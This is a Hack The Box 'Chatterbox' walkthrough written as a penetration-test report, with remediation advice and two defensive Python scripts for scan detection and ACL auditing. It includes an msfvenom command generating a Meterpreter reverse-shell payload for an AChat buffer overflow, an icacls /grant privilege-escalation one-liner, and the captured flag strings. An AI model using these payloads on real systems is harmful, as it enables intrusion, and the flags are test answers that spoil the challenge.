HTB Walkthrough at Bottom
Key Takeaways
The AChat LAN chat server running on this host is a version with a well-known, publicly available buffer-overflow exploit (see 1.2). It gives an outside threat actor unauthenticated remote code execution as a local user, and a file-permission misconfiguration that was never reviewed (see 1.3) then lets that user escalate privileges and read files that should be reserved for the Administrator.
Objectives
Gain remote access to the target machine and read the “user flag” string; then escalate privileges, usually to the Administrator (root) account, and read the “root flag,” which should be readable only by that account.
Recommendations
1.1 Nmap Scan
The target machine accepted a full nmap scan without any sign of detection or blocking, exposing every open port together with service names and version strings.
“Nmap, a key tool in penetration testing, is used to discover hosts and vulnerabilities by probing network services. The official Nmap documentation https://nmap.org/book/ outlines its methodology, involving packet transmission and response analysis. While invaluable for identifying weaknesses, Nmap scans carry risks, potentially triggering security alerts and revealing the penetration test. Balancing its significance and associated risks is crucial for a successful penetration testing strategy.”
Risk
Allowing an nmap or similar scan to go undetected and unprevented carries several risks. It lets a threat actor map the network and learn about the infrastructure, operating system and other services running on the host; here the scan returned the OS build, hostname, SMB configuration and the AChat version string that the exploit in 1.2 depends on. Everything an attacker gathers during this discovery phase feeds the next step, so limit the interfaces and services exposed to untrusted networks and monitor the ones that remain.
Recommendations
There are ways to prevent, or at a minimum, detect an nmap scan or other network mapping scan performed against a network (Detecting a Scan > Penetration Testing and Network Defense: Performing Host Reconnaissance | Cisco Press):
· Intrusion Detection
IDSs are similar to home security systems (burglar alarms) that monitor entry or breach into your home or office. Like the home security systems, IDSs log an alarm entry into the network. Unlike most home systems, however, you can configure an IDS to actually fight back with TCP RSTs and SHUN commands in the efforts to stop further entry or damage to the network. Location is critical with these systems, just like a standard security camera is to a security guard. That is why most IDSs are located where they can see as much traffic as possible.
· Anomaly Detection Systems
Anomaly detection systems (also called profile-based detection systems) are designed to watch user or network profiles. For example, an anomaly detection system alarms if it notices a network that normally is at 30 percent utilization peak up to 90 percent for a long period.
· Misuse Detection System
Misuse detection uses pattern matching. These systems contain a database of hundreds of patterns and signatures that are used to match with traffic on a network cable. You can compare misuse detection to standard disk antivirus software, where the antivirus software scans your hard drive looking for patterns in programs and files that represent malicious alterations. Misuse detection reads frames and packets off a cable instead of a hard drive. These are the most commonly used detection systems today. However, they can quickly become out of date as new attacks emerge that are not within the signature database.
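As an added example (not part of the original post or of the Cisco Press text quoted above), here is the kind of rule the anomaly/misuse systems above apply, written in Python and run over a constructed excerpt of a Windows Firewall pfirewall.log: one source opening connections to many distinct ports within a short window is flagged as a scan. The log lines, timestamps, threshold and the 10.129.235.10 client are made up for the example; the 10.10.14.8 and 10.129.235.168 addresses are borrowed from the walkthrough. Note that Windows Firewall logs only dropped packets unless “log successful connections” is enabled, so the ALLOW lines assume that setting.

```python
"""Scan detection over Windows Firewall log records (added example, not the post's code)."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List

# Constructed excerpt in the W3C layout Windows Firewall writes to pfirewall.log.
# 10.10.14.8 probes ten distinct ports on 10.129.235.168 within a few seconds;
# 10.129.235.10 only ever opens SMB (445), i.e. normal file-share traffic.
# The short line near the end stands in for a truncated record.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-03-01 10:15:00 ALLOW TCP 10.129.235.10 10.129.235.168 50211 445 52 S 1 0 8192 - - - RECEIVE
2024-03-01 10:15:01 DROP TCP 10.10.14.8 10.129.235.168 41001 21 52 S 2 0 1024 - - - RECEIVE
2024-03-01 10:15:01 DROP TCP 10.10.14.8 10.129.235.168 41002 22 52 S 3 0 1024 - - - RECEIVE
2024-03-01 10:15:02 DROP TCP 10.10.14.8 10.129.235.168 41003 80 52 S 4 0 1024 - - - RECEIVE
2024-03-01 10:15:02 ALLOW TCP 10.10.14.8 10.129.235.168 41004 135 52 S 5 0 1024 - - - RECEIVE
2024-03-01 10:15:03 ALLOW TCP 10.10.14.8 10.129.235.168 41005 139 52 S 6 0 1024 - - - RECEIVE
2024-03-01 10:15:04 ALLOW TCP 10.129.235.10 10.129.235.168 50212 445 52 S 7 0 8192 - - - RECEIVE
2024-03-01 10:15:04 ALLOW TCP 10.10.14.8 10.129.235.168 41006 445 52 S 8 0 1024 - - - RECEIVE
2024-03-01 10:15:05 DROP TCP 10.10.14.8 10.129.235.168 41007 3389 52 S 9 0 1024 - - - RECEIVE
2024-03-01 10:15:06 ALLOW TCP 10.10.14.8 10.129.235.168 41008 9255 52 S 10 0 1024 - - - RECEIVE
2024-03-01 10:15:06 ALLOW TCP 10.10.14.8 10.129.235.168 41009 9256 52 S 11 0 1024 - - - RECEIVE
2024-03-01 10:15:07 ALLOW TCP 10.129.235.168 10.10.14.8 49161 4443 52 S 12 0 8192 - - - SEND
2024-03-01 10:15:08 DROP TCP 10.10.14.8 10.129.235.168 41010 49152
2024-03-01 10:15:09 ALLOW TCP 10.10.14.8 10.129.235.168 41011 49153 52 S 13 0 1024 - - - RECEIVE
2024-03-01 10:15:30 ALLOW TCP 10.129.235.10 10.129.235.168 50213 445 52 S 14 0 8192 - - - RECEIVE
"""


@dataclass(frozen=True)
class Event:
    ts: datetime
    action: str
    src: str
    dst: str
    dport: int
    direction: str      # RECEIVE (inbound) or SEND (outbound)


@dataclass(frozen=True)
class ScanAlert:
    src: str
    first_seen: datetime
    last_seen: datetime
    distinct_ports: int


def parse_pfirewall(text: str) -> List[Event]:
    """Parse pfirewall.log text, keeping only TCP SYNs (new connection attempts)."""
    fields, events = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names come from the header itself
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                           # truncated/malformed record: skip, don't crash
        rec = dict(zip(fields, parts))
        if rec["protocol"] != "TCP" or rec["tcpflags"] != "S":
            continue
        events.append(Event(datetime.fromisoformat(rec["date"] + " " + rec["time"]),
                            rec["action"], rec["src-ip"], rec["dst-ip"],
                            int(rec["dst-port"]), rec["path"]))
    return events


def detect_port_scans(events: Iterable[Event], window: timedelta = timedelta(seconds=60),
                      threshold: int = 10) -> List[ScanAlert]:
    """Alert once per source that touches >= threshold distinct inbound ports within window.
    DROP and ALLOW both count: a scanner hits closed ports as well as open ones."""
    recent = defaultdict(deque)                # src -> deque of (timestamp, dst-port)
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.direction != "RECEIVE":
            continue                           # outbound traffic is not an inbound scan
        q = recent[ev.src]
        q.append((ev.ts, ev.dport))
        while q and ev.ts - q[0][0] > window:  # slide the window forward
            q.popleft()
        distinct = {port for _, port in q}
        if len(distinct) >= threshold and ev.src not in alerted:
            alerted.add(ev.src)
            alerts.append(ScanAlert(ev.src, q[0][0], ev.ts, len(distinct)))
    return alerts


if __name__ == "__main__":
    for alert in detect_port_scans(parse_pfirewall(SAMPLE_LOG)):
        print(f"possible port scan from {alert.src}: {alert.distinct_ports} ports "
              f"between {alert.first_seen:%H:%M:%S} and {alert.last_seen:%H:%M:%S}")
```

The threshold and window are the tuning knobs: a full-port nmap scan like the one in the Methodology section trips even a conservative threshold within a second or two, while a slow scan (nmap -T0/-T1 style) spreads probes beyond the window and needs a longer window or a per-day distinct-port count to catch. The same distinct-port logic works on any source that records source address, destination port and time (pfSense, Zeek conn.log, NetFlow); only the parser changes.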
1.2 AChat Reverse-TCP Exploit (Buffer Overflow)
“AChat client is software which allows you to connect to any Online Chat service using Windows Live ID. AChat client is the most important component of a good Live ID service. AChat client works exactly as a Desktop application. AChat client works on the basis of a central “ui” system (including channel list, room list, message board) and each instance of a Chat client connects to a unique central channel.”
This software was installed and running on the machine, listening on ports 9255 and 9256. That fact, paired with the version string shown in the nmap scan, let me look for an exploit for this particular version (AChat 0.150 Beta 7, Windows 7/8/10 x86/x64). A quick Google search showed that this version is vulnerable to a remote buffer overflow with public exploit code that returns a reverse shell; it worked as advertised and gave me an easy entry point to the system.
This GitHub page, along with this Exploit-DB page, gave me the exact payload I needed. By changing the target IP to the one I was given, and the listening host and port to my own machine, I launched a payload that started a reverse shell back to my machine and gave me access as user “Alfred.”
Risk
This vulnerability carries a high risk: any machine running this version of the software can be remotely compromised by an unauthenticated attacker who knows nothing more than its IP address. It is a buffer overflow in the AChat server’s handling of network input, and the public exploit needs no credentials and no user interaction.
Recommendations
There are a few ways to prevent this from being exploited. The easiest would be to update to a version of AChat in which the overflow is fixed. In practice that is hard to do: no maintained, patched release could be found online without a license or vendor support, and a download from an unofficial source is itself a supply-chain risk.
A better, though possibly more costly and resource-consuming, alternative would be to migrate this chat system to a different platform.
This list details 13 open-source, free alternatives for LAN messengers and local network chat clients.
If in the budget, Rocket.chat is another platform that can be utilized, as it has great reviews and a live support feature, as well as enterprise pricing plans for larger organizations (Rocket.Chat: Communications Platform You Can Fully Trust).
1.3 ICACL /grant
Once I had access as user “Alfred,” escalating privileges took about 10 minutes with the permissions this user was granted. Assuming that this was an overlooked configuration and not intentional, there are ways to patch this to defend against simple escalation of privileges by this method.
“In a cybersecurity context, the term “icacl /grant” likely refers to a command used in Microsoft Windows environments to modify or grant permissions using the iCACLS (Integrity Control Access Control List) command-line tool. The iCACLS command is used to view and manipulate discretionary access control lists (DACLs) on specified files, folders, or other objects in the Windows operating system.
Specifically, the “/grant” option is used to grant specific permissions to a user or group on a particular object. Permissions control who can access a resource and what actions they can perform on it. By using “icacl /grant,” administrators can explicitly define and modify these permissions.”
Since user Alfred was shown to have read access to the Administrator’s Desktop, we assumed something more could be done as this user to gain read access to the files in it.
A simple one-liner granted full control over any file we named. icacls itself is a built-in tool available to every user, so its presence is not the problem: /grant only succeeds when the calling account already holds the change-permissions right (WRITE_DAC) on the object, owns it, or holds a privilege such as SeTakeOwnershipPrivilege. What made the command work here is that Alfred already had that level of control over files in the Administrator’s profile, a configuration that should never apply to a non-administrative account and was most likely left unreviewed rather than set on purpose.
Risk
This is a risk for exactly the reason it was used here. An attacker with a low-privileged foothold can grant themselves read, write and execute access to files they should not be able to reach, compromising the security of the machine and everything stored on it.
Recommendations
The fix is to correct the file permissions and ownership, not to block the icacls command (which would not help, since the same change can be made through Explorer, PowerShell’s Set-Acl or the Win32 API). Remove the non-administrative account’s entries from the Administrator profile, make sure an administrator owns those files, and re-check with icacls after the change. This article outlines some steps for restricting /grant to specific users on specific files and folders. This is a simple fix for a high-rated vulnerability.
Methodology
Enumeration
To begin, we run an nmap scan on this box, as we usually do. -sV identifies service versions, -sC runs the default script set, and -p- covers all 65535 TCP ports rather than only the 1000 most common ones, so nothing listening on an unusual port is missed.
nmap -sV -sC -p- 10.129.235.168
From this, we can see a few different ports running.
Based on the Nmap scan results, it appears to be a Windows machine running Windows 7 Professional 7601 Service Pack 1. The hostname is identified as “CHATTERBOX,” and the system is part of the “WORKGROUP” workgroup. The open ports suggest typical services and protocols associated with Windows systems, such as Microsoft RPC, netbios-ssn, and a chat system on ports 9255 and 9256.
Of note, guest access is enabled on the SMB service, and SMB message signing is not required (the default on Windows hosts that are not domain controllers).
Let’s start by looking at AChat.
“AChat client is software which allows you to connect to any Online Chat service using Windows Live ID.”
A quick Google search shows a reverse TCP shell exploit on GitHub, so let’s check that out.
GitHub — mpgn/AChat-Reverse-TCP-Exploit: Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
This exploit is shown to work on Windows 7/8 and 10, and we know that this machine is running Windows 7 Professional (we know this from our nmap scan), so we have a strong guess that it will work.
AChat Reverse Shell
Let’s check out what this GitHub page says to do, and then try it out.
This is a stack-based buffer overflow: the AChat server copies an over-long field from a crafted chat message into a fixed-size stack buffer without a length check, so the message overwrites saved control data and redirects execution into shellcode carried in the same message. Because the server converts the input to Unicode before the overflow, the shellcode has to survive that expansion, which is why the msfvenom step below uses the x86/unicode_mixed encoder.
Let’s use msfvenom to craft our payload.
First, clone the GitHub repo to our local machine.
Following the instructions in the GitHub readme, we run the shell script locally, which generates the payload.
After entering our details for the payload when prompted, we then get an output to copy into our payload, which we will then copy and paste into the .py file.
We can then start the msfconsole and run our crafted payload.
In Metasploit, we will set the LHOST to our local IP, along with the LPORT to our local listening port. I will use 4444, as is used by default.
After running the listener on msfconsole and launching the payload from the GitHub repo, we are unable to get a connection. We will have to find an alternative way.
Exploit-DB Method
Fortunately, after poking around some more, we found another exploit for AChat we can try out.
AChat 0.150 beta7 — Remote Buffer Overflow — Windows remote Exploit (exploit-db.com)
The page shows a simple one-liner we can modify and run to start:
msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We need to change the payload from windows/exec with CMD=calc.exe to a reverse shell, and add our local IP and port. The other options stay as they are: -a x86 and --platform Windows match the target process, -e x86/unicode_mixed produces shellcode that still runs after the server widens it to UTF-16, -b lists the bytes the buffer cannot contain (0x00 and everything from 0x80 to 0xff), BufferRegister=EAX tells the encoder that EAX points at the start of the buffer when it executes, and -f python prints the result as a Python string ready to paste into the exploit script:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
After running this, we are given a payload we can use in our buffer overflow attack.
Copy the exploit script into a new .py file, replace its shellcode with the one we just generated, and start msfconsole as a listener as before: use exploit/multi/handler with the same payload (windows/meterpreter/reverse_tcp), LHOST and LPORT that were given to msfvenom; a mismatch in any of the three means the stager connects but never receives its second stage.
It is important to change the target IP in the Python script to the correct one:
Because I was having trouble with Metasploit, I used a plain netcat listener to catch the connection instead.
After a few attempts, the connection kept dropping.
That is expected for this payload: windows/meterpreter/reverse_tcp is staged, so the small stager in the shellcode connects back and waits for the handler to send the rest of Meterpreter. netcat has nothing to send, so the stager times out and the session dies. Using exploit/multi/handler in msfconsole gives a stable session; a stageless payload would be needed for netcat to work.
We can cd .. from wherever the Meterpreter session lands until we reach the root of C:\.
From here, we can navigate to get the user flag:
User flag: 3c40b5285669016fec7a274be7e60426
Privilege Escalation
We can find the root flag on user Administrator’s desktop, though we cannot access it.
We are able to access user Alfred’s desktop, so let’s see what else he can do.
We are in a Meterpreter session, but the next commands need a real Windows command prompt, so we drop into one with the shell command.
Let’s now run something that will show us the ACL for this user.
icacls Desktop (run from C:\Users\Administrator, so the object inspected is C:\Users\Administrator\Desktop)
Interesting: Alfred can read and traverse the Administrator’s Desktop, but cannot read the root.txt file we need. Let’s see whether we can simply grant ourselves that permission. icacls /grant only succeeds if the calling account already holds the change-permissions right (WRITE_DAC) on the object, owns it, or has a privilege such as SeTakeOwnershipPrivilege; icacls does not print the owner, but dir /q does, so that is worth checking first.
We can; we simply have to run:
icacls root.txt /grant Alfred:F
Root flag: ee74988424b07a8714e4179b84eee060
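To turn the check above, and the recommendation in section 1.3, into something repeatable, here is an added example (not code from the original post) that parses the text icacls prints and flags any principal outside an allow-list holding rights that let it rewrite the DACL (F, WDAC, WO) or modify contents on files under another user’s profile, then emits the icacls commands that strip those entries. The sample output is constructed: the CHATTERBOX host and the Alfred/Administrator names come from the walkthrough, the ACL contents are invented to show one bad entry in both its explicit and inherited form. Assumptions worth knowing: the path/principal split on an object’s first line is a heuristic (known authority prefixes, then the last space), group membership is not expanded, so pass every group the account belongs to if you want those covered, and icacls never prints the owner, so an owner check (dir /q) has to be done separately.

```python
"""Audit icacls output for ACEs that let a non-admin account rewrite another user's
file permissions (added example, not the post's code)."""
import re
from dataclasses import dataclass
from typing import FrozenSet, List

# Constructed output in the layout `icacls <path> /t` prints. Host and user names are
# taken from the walkthrough; the ACL contents are invented to show the bad case.
SAMPLE_ICACLS = r"""
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(OI)(CI)(RX,WDAC)
C:\Users\Administrator\Desktop\root.txt NT AUTHORITY\SYSTEM:(I)(F)
                                        BUILTIN\Administrators:(I)(F)
                                        CHATTERBOX\Administrator:(I)(F)
                                        CHATTERBOX\Alfred:(I)(RX,WDAC)
C:\Users\Administrator\Desktop\notes.txt NT AUTHORITY\SYSTEM:(I)(F)
                                         BUILTIN\Administrators:(I)(F)
                                         CHATTERBOX\Administrator:(I)(F)
                                         CHATTERBOX\Guest:(DENY)(F)

Successfully processed 3 files; Failed processing 0 files
"""

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
DACL_RIGHTS = {"F", "WDAC", "WO", "GA"}   # enough for `icacls <file> /grant <user>:F` to succeed
WRITE_RIGHTS = {"M", "W", "WD", "AD", "D", "DC", "GW"}
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}
AUTHORITIES = ("NT AUTHORITY\\", "BUILTIN\\", "NT SERVICE\\", "APPLICATION PACKAGE AUTHORITY\\")


@dataclass(frozen=True)
class Ace:
    path: str
    principal: str
    deny: bool
    inherited: bool
    rights: FrozenSet[str]


@dataclass(frozen=True)
class Finding:
    path: str
    principal: str
    inherited: bool
    reason: str


def _split_path_principal(left: str):
    # An object's first line is "<path> <principal>"; both can contain spaces, so look
    # for a known authority prefix first and fall back to the last space (heuristic).
    for auth in AUTHORITIES:
        idx = left.rfind(" " + auth)
        if idx != -1:
            return left[:idx], left[idx + 1:]
    path, _, principal = left.rpartition(" ")
    return path, principal


def parse_icacls(output: str) -> List[Ace]:
    aces: List[Ace] = []
    path = ""
    for line in output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        left, sep, flags = line.strip().rpartition(":")   # rights never contain ':'
        if not sep:
            continue
        if not line.startswith(" "):                      # unindented: new object
            path, principal = _split_path_principal(left)
        else:                                             # indented: same object
            principal = left
        tokens = {t for grp in re.findall(r"\(([^()]*)\)", flags) for t in grp.split(",") if t}
        aces.append(Ace(path, principal, "DENY" in tokens, "I" in tokens,
                        frozenset(tokens - INHERIT_FLAGS - {"DENY"})))
    return aces


def audit(output: str, owner: str) -> List[Finding]:
    """Flag allow-ACEs giving DACL-rewrite or write rights to anyone but SYSTEM,
    Administrators and the profile owner. Deny ACEs are skipped (they only restrict)."""
    trusted = TRUSTED | {owner}
    findings = []
    for ace in parse_icacls(output):
        if ace.deny or ace.principal in trusted:
            continue
        dacl, write = ace.rights & DACL_RIGHTS, ace.rights & WRITE_RIGHTS
        if dacl:
            findings.append(Finding(ace.path, ace.principal, ace.inherited,
                                    "can rewrite the DACL via " + ",".join(sorted(dacl))))
        elif write:
            findings.append(Finding(ace.path, ace.principal, ace.inherited,
                                    "can modify contents via " + ",".join(sorted(write))))
    return findings


def remediation(f: Finding) -> List[str]:
    """icacls commands that strip the principal. An inherited ACE cannot be removed on the
    child directly: break inheritance (keeping copies) first, or fix it at the parent."""
    cmds = []
    if f.inherited:
        cmds.append(f'icacls "{f.path}" /inheritance:d')
    cmds.append(f'icacls "{f.path}" /remove:g "{f.principal}"')
    return cmds


if __name__ == "__main__":
    for finding in audit(SAMPLE_ICACLS, owner="CHATTERBOX\\Administrator"):
        print(f"{finding.path}: {finding.principal} {finding.reason}")
        for cmd in remediation(finding):
            print("   ", cmd)
```

Run it against the output of icacls C:\Users\Administrator /t captured from the host; the findings for the sample are Alfred’s explicit (RX,WDAC) entry on the Desktop folder and the copy root.txt inherits from it. Fixing the explicit entry on the folder is what actually removes the inherited copies, so prefer the parent-level command and use the /inheritance:d fallback only where an object must keep its own ACL.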
Keywords
Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb chatterbox